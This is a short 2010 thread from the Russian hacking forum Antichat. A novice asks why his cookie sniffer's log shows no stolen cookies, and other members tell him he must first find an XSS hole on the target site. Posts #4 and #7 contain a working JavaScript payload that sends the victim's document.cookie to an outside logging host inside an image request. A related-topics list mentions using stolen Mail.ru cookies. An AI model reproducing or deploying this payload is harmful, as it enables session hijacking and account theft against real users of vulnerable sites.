ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

куки
  #1  
Старый 09.03.2010, 18:06
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию куки

09.03.2010 16:00:49 []
IP: 92.126.**.*** Real IP*: 92.126.**.***, 193.169.***.***

QUERY:


cck_count=0; cck_lasttime=1**8***641***

REFERER: empty
AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20***115 Firefox/3.6 (.NET CLR 3.5.3***9) и где тут куки???
 
Ответить с цитированием

  #2  
Старый 09.03.2010, 18:10
Аватар для shuba
shuba
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051

Репутация: 133


По умолчанию

Нету

в куках по крайней мере мыло должно быть видно
 
Ответить с цитированием

  #3  
Старый 09.03.2010, 18:14
Аватар для root_sashok
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635

Репутация: 1593


Отправить сообщение для root_sashok с помощью ICQ
По умолчанию

QUERY, собственно.
 
Ответить с цитированием

  #4  
Старый 09.03.2010, 18:14
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

вот именно, я подкидываю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> И ГДЕ МОИ КУКИ????
 
Ответить с цитированием

  #5  
Старый 09.03.2010, 18:15
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
в куках по крайней мере мыло должно быть видно
ты не прав
повидимому вот это
Код:
cck_count=0; cck_lasttime=1**8***641***
 
Ответить с цитированием

  #6  
Старый 09.03.2010, 18:18
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

куки же длинные? по крайней мере те которые я видел
 
Ответить с цитированием

  #7  
Старый 09.03.2010, 18:22
Аватар для seofilms
seofilms
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
Провел на форуме:
2312554

Репутация: 97
По умолчанию

Цитата:
<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
и что ты планировал тут увидеть ??? у тебя запишется только Ip + в query надпись document.cookies;, тебе надо еще найти xss на сайте...
 
Ответить с цитированием

  #8  
Старый 09.03.2010, 18:23
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
куки же длинные? по крайней мере те которые я видел
они любыми могут быть, посмотри как например работает функция setcookie() в php
 
Ответить с цитированием

  #9  
Старый 09.03.2010, 18:27
Аватар для Alk@sh
Alk@sh
Новичок
Регистрация: 05.07.2009
Сообщений: 29
Провел на форуме:
489621

Репутация: 18
Отправить сообщение для Alk@sh с помощью ICQ
По умолчанию

самое главное тебе надо найти xss
 
Ответить с цитированием

  #10  
Старый 09.03.2010, 18:28
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

я мейловские куки глянул, они большие, да и видео когда смотрел там большие
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ввожу краденные куки в Mail и нифига!!! почему так? Dr..VATSON Болталка 21 11.01.2010 09:14
Аудит аутентификации на Web-сайтах. Часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:20
Проверка надежности Web-приложений. Часть Третья k00p3r Чужие Статьи 0 13.06.2005 11:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ